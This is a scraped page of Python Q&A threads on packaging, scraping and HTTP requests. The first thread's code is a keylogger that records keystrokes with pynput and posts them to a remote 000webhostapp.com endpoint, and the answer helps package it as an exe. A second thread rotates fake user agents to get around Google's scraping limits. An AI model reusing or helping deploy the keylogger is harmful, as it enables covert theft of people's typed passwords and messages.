No module named requests found in exe on Windows 10 - Python

When I convert the code below with PyInstaller and run it as an exe in a Windows 10 VM, it prints a "no module named requests" error.
import pynput
import requests
import json

key_count = 0
keys = []

def on_press(key):
    global key_count
    global keys
    keys.append(str(key))
    key_count += 1
    if key_count >= 10:
        key_count = 0
        send_keys()

def send_keys():
    data = json.dumps({'key_data': ''.join(keys)})
    headers = {'Content-type': 'application/json'}
    keys.clear()
    url = 'https://000webhostapp.com/dog.php'
    try:
        response = requests.post(url, data=data, headers=headers)
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
    else:
        print('Data sent successfully')

with pynput.keyboard.Listener(on_press=on_press) as listener:
    listener.join()
I tried forcing the conversion with a command-line option to include the module, but it didn't work, and I don't know what else to do. Any help would be appreciated; thank you in advance.

As far as I can tell from what you said, you are not using a virtualenv: you installed Python directly on your computer and started running the script.
The requests library is not one of the libraries that ship with Python by default.
To install it:
python -m pip install requests
For an answer to "What is a virtualenv and how do I use it?", with the requests library as the example, see:
https://docs.python-guide.org/dev/virtualenvs/

I already tried your command, but I get the same error. I used this command to convert the .py:
pyinstaller --onefile your_script_name.py
Thank you :)
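If installing requests doesn't fix the frozen exe, one more thing worth trying (a suggestion, not something confirmed in this thread) is telling PyInstaller explicitly to bundle the module it fails to detect:
pyinstaller --onefile --hidden-import requests your_script_name.py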

Related

adding fake_useragent to people_also_ask module

I want to scrape Google's 'People also ask' questions/answers. I am doing it successfully with the following module:
pip install people_also_ask
The problem is that the library is configured so that no one can send many requests to Google. I want to send 1000 requests per day, and to achieve that I have to add fake_useragent to the module. I tried a lot, but when I add a fake user agent to the header it raises an error. I am not a pro, so I must have done something wrong myself. Can anyone help me add fake_useragent to the people_also_ask module? Here is the working code to get questions/answers:
from encodings import utf_8
import people_also_ask as paa
from fake_useragent import UserAgent

ua = UserAgent()

while True:
    input("Please make sure the queries are in \\query.txt file.\npress Enter to continue...")
    try:
        query_file = open("query.txt", "r")
        queries = query_file.readlines()
        query_file.close()
        break
    except:
        print("Error with the query.txt file...")

for query in queries:
    res_file = open("result.csv", "a", encoding="utf_8")
    try:
        query = query.replace("\n", "")
    except:
        pass
    print(f'Searching for "{query}"')
    questions = paa.get_related_questions(query, 14)
    questions.insert(0, query)
    print("\n________________________\n")
    main_q = True
    for i in questions:
        i = i.split('?')[0]
        try:
            answer = str(paa.get_answer(i)['response'])
            if answer[-1].isdigit():
                answer = answer[:-11]
            print(f"Question:{i}?")
        except Exception as e:
            print(e)
        print(f"Answer:{answer}")
        if main_q:
            a = ""
            b = ""
            main_q = False
        else:
            a = "<h2>"
            b = "</h2>"
        res_file.writelines(str(f'{a}{i}?{b},"<p>{answer}</p>",'))
        print("______________________")
    print("______________________")
    res_file.writelines("\n")
    res_file.close()

print("\nSearch Complete.")
input("Press any key to Exit!")
This is against Google's terms of service, and the wishes of the people_also_ask package. This answer is for educational purposes only.
You asked why fake_useragent is prevented from working. It's not prevented from working; the people_also_ask package simply doesn't make any calls that use fake_useragent. You can't just import a package and expect another package to start using it. You have to manually make the packages work together.
To do that, you need some idea of how the two packages work. Have a look at the source code and you will see you can make them work together very easily: just substitute the constant header in people_also_ask with one generated by fake_useragent before you request any data.
paa.google.HEADERS = {'User-Agent': ua.random} # replace the HEADER with a randomised HEADER from fake_useragent
questions = paa.get_related_questions(query, 14)
and
paa.google.HEADERS = {'User-Agent': ua.random} # replace the HEADER with a randomised HEADER from fake_useragent
answer = str(paa.get_answer(i)['response'])
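Putting the two substitutions together, a minimal sketch of the patched calls (assuming the rest of the script from the question is unchanged; the helper names fetch_related_questions and fetch_answer are mine, just to keep the header swap in one place):
import people_also_ask as paa
from fake_useragent import UserAgent

ua = UserAgent()

def fetch_related_questions(query):
    # Swap the package's constant header for a randomised one before each request
    paa.google.HEADERS = {'User-Agent': ua.random}
    return paa.get_related_questions(query, 14)

def fetch_answer(question):
    paa.google.HEADERS = {'User-Agent': ua.random}
    return str(paa.get_answer(question)['response'])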
NOTE:
Not all user agents will work. Google doesn't give related questions depending on the user agent. It is not the fault of either the fake_useragent, or the people_also_ask package.
To alleviate this issue somewhat, make sure you call ua.update(), and you can also use PR #122 of fake_useragent to select only a subset of the newest user agents, which are more likely to work, though you will still get a few missed queries. There is a reason the people_also_ask package didn't bypass or work around this limitation from Google.

Error download when using python Wget lib

Is there a way to restart the download if it gets stuck at XX%? I'm scraping and downloading quite a lot of files using the code below. It handles connection errors, but it won't restart a download that gets stuck.
for element in elements:
    for attempt in range(100):
        try:
            wget.download(element.get_attribute("href"), path)
        except:
            print("attempt error, retry" + str(attempt))
        else:
            break
It seems there is no feature to restart a download. I looked at many examples of this package (https://www.programcreek.com/python/example/83386/wget.download); the page for the manual is gone, and the pypi.org page doesn't have any info about a feature like this.
However, you can retry the download by looping until it succeeds or runs out of attempts. This code should work for you:
# Track download success so the loop ends once it succeeds;
# each file gets up to 5 attempts before the loop gives up
for element in elements:
    downloaded = False
    attempts = 0
    while not downloaded and attempts < 5:
        try:
            wget.download(element.get_attribute("href"), path)
            # Set downloaded flag to end the loop
            downloaded = True
        except:
            attempts += 1
            print("attempt error, retry " + str(attempts))
Another approach is to use the requests library, which is more popular.
import requests

def proceed_files():
    # Each file gets up to 5 attempts before the loop gives up
    file_urls = ['list', 'of', 'file urls']
    for url in file_urls:
        downloaded = False
        attempts = 0
        while not downloaded and attempts < 5:
            if download_file(url):
                downloaded = True
            else:
                attempts += 1

def download_file(url):
    try:
        request = requests.get(url, allow_redirects=True)
        # Name the local file after the last segment of the URL
        file_name = url.split('/')[-1]
        open(file_name, 'wb').write(request.content)
        return True
    except:
        return False
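One caveat with both versions: a transfer that stalls midway can still hang, because neither wget.download nor a plain requests.get has a time limit by default. Here is a sketch of a download_file variant (the 30-second timeout is my assumption; tune it to your file sizes) that makes a stalled transfer raise an exception so the retry loop can catch it:
import requests

def download_file(url, timeout_seconds=30):
    try:
        # With stream=True, the timeout applies to the connection and to each
        # chunk read, so a stuck transfer fails instead of hanging forever
        response = requests.get(url, allow_redirects=True, stream=True,
                                timeout=timeout_seconds)
        response.raise_for_status()
        file_name = url.split('/')[-1]
        with open(file_name, 'wb') as f:
            for chunk in response.iter_content(chunk_size=8192):
                f.write(chunk)
        return True
    except requests.exceptions.RequestException:
        return False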

Module urllib.request not getting data

I am trying to test this demo program from Lynda using Python 3. I am using PyCharm as my IDE. I already added and installed the request package, but when I run the program it finishes cleanly with "Process finished with exit code 0" and shows no output from the print statements. Where am I going wrong?
import urllib.request  # instead of urllib2 like in Python 2.7
import json

def printResults(data):
    # Use the json module to load the string data into a dictionary
    theJSON = json.loads(data)
    # now we can access the contents of the JSON like any other Python object
    if "title" in theJSON["metadata"]:
        print(theJSON["metadata"]["title"])
    # output the number of events, plus the magnitude and each event name
    count = theJSON["metadata"]["count"]
    print(str(count) + " events recorded")
    # for each event, print the place where it occurred
    for i in theJSON["features"]:
        print(i["properties"]["place"])
    # print only the events that have a magnitude greater than 4
    for i in theJSON["features"]:
        if i["properties"]["mag"] >= 4.0:
            print("%2.1f" % i["properties"]["mag"], i["properties"]["place"])
    # print only the events where at least 1 person reported feeling something
    print("Events that were felt:")
    for i in theJSON["features"]:
        feltReports = i["properties"]["felt"]
        if feltReports is not None:
            if feltReports > 0:
                print("%2.1f" % i["properties"]["mag"], i["properties"]["place"], " reported " + str(feltReports) + " times")

# Open the URL and read the data
urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
webUrl = urllib.request.urlopen(urlData)
print(webUrl.getcode())
if webUrl.getcode() == 200:
    data = webUrl.read()
    data = data.decode("utf-8")  # in Python 3.x we need to explicitly decode the response to a string
    # print out our customized results
    printResults(data)
else:
    print("Received an error from server, cannot retrieve results " + str(webUrl.getcode()))
Not sure if you left this out on purpose, but this script isn't actually executing any code beyond the imports and function definition. Assuming you didn't leave it out on purpose, you would need the following at the end of your file.
if __name__ == '__main__':
    data = ""  # your data
    printResults(data)
The check on __name__ equaling "__main__" is just so your code only executes when the file is explicitly run. To always run your printResults(data) function when the file is accessed (say, if it's imported into another module), you could just call it at the bottom of your file like so:
data = "" # your data
printResults(data)
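Wiring the question's own fetch code into that guard (a sketch, reusing the URL and decode step from the question) would look like:
if __name__ == '__main__':
    urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
    webUrl = urllib.request.urlopen(urlData)
    if webUrl.getcode() == 200:
        printResults(webUrl.read().decode("utf-8"))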
I had to restart the IDE after installing the module. I just realized that and tried it now with "Run as Admin"; strangely, it seems to work now. I'm not sure if it was a temporary error, though, since even without a restart it was able to detect the module and its methods.
Your comments about having to restart your IDE make me think that PyCharm might not automatically detect newly installed Python packages. This SO answer seems to offer a solution.

python lambda can't detect packaged modules

I'm trying to create a Lambda function by uploading a zip file with a single .py file at the root and two folders containing the requests lib downloaded via pip.
Running the code locally works fine. When I zip and upload the code, I very often get this error:
Unable to import module 'main': No module named requests
Sometimes I do manage to fix this, but it's inconsistent and I'm not sure how I'm doing it. I'm using the following command (in the root dir):
zip -r upload.zip *
This is how I'm importing requests:
import requests
FYI:
1. I have attempted a number of different import methods using the exact path, all of which failed, so I wonder if that's the problem?
2. Every time this has failed and I've then managed to make it work in Lambda, it has involved a lot of fiddling with the zip command, as I thought the problem was that I was zipping the contents incorrectly and hiding them behind an extra parent folder.
Looking forward to seeing the silly mistake I've been making!
Adding code snippet:
import json      ## Built In
import requests  ## Packaged with
import sys       ## Built In

def lambda_function(event, context):
    alias = event['alias']
    message = event['message']
    input_type = event['input_type']

    if input_type == "username":
        username = alias
    elif input_type == "email":
        username = alias.split('@', 1)[0]
    elif input_type is None:
        print "input_type 'username' or 'email' required. Closing..."
        sys.exit()

    payload = {
        "text": message,
        "channel": "#" + username,
        "icon_emoji": "<an emoji>",
        "username": "<an alias>"
    }

    r = requests.post("<slackurl>", json=payload)
    print(r.status_code, r.reason)
I got some help outside the Stack Overflow loop, and this seems to work consistently:
zip -r upload.zip main.py requests requests-2.9.1.dist-info
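If the upload still fails, a quick way to check the archive layout (a sketch; the file names are taken from the question) is to list it and confirm main.py and requests/ sit at the top level rather than under a parent folder:
import zipfile

# Lambda expects main.py and the requests/ package at the root of the zip,
# not nested inside a parent directory
with zipfile.ZipFile("upload.zip") as zf:
    for name in zf.namelist():
        print(name)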

Weird json value urllib python

I'm trying to manipulate a dynamic JSON from this site:
http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do
It has three elements: imagem (a base64 image), labelValorCaptcha (just a message), and uuidCaptcha (a value to pass as a parameter to play a sound at the link below):
http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha=sajcaptcha_e7b072e1fce5493cbdc46c9e4738ab8a
When I open the first site in a browser and paste the uuidCaptcha after the equals sign ("...uuidCaptcha=") in the second link, the sound plays normally. I wrote some simple code to fetch these elements:
import urllib, json
url = "http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do"
response = urllib.urlopen(url)
data = json.loads(response.read())
urlSound = "http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha="
print urlSound + data['uuidCaptcha']
But I don't know what's happening: the captured uuidCaptcha value doesn't work; it opens an error web page.
Does anyone know why?
Thanks!
It works for me.
$ cat a.py
#!/usr/bin/env python
# encoding: utf-8
import urllib, json
url = "http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do"
response = urllib.urlopen(url)
data = json.loads(response.read())
urlSound = "http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha="
print urlSound + data['uuidCaptcha']
$ python a.py
http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha=sajcaptcha_efc8d4bc3bdb428eab8370c4e04ab42c
As @Charlie Harding said, the best way is to download the page and get the JSON values from it, because this JSON is dynamic and needs an open web session to exist.
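A sketch of that idea using the requests library with a single Session (my choice; the thread itself only shows urllib), so the uuidCaptcha is consumed by the same session that produced it:
import requests

session = requests.Session()

# Fetch a fresh captcha JSON, then use its uuid within the same session
data = session.get("http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do").json()
sound = session.get(
    "http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do",
    params={"timestamp": "1455996420264", "uuidCaptcha": data["uuidCaptcha"]},
)
print(sound.status_code)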
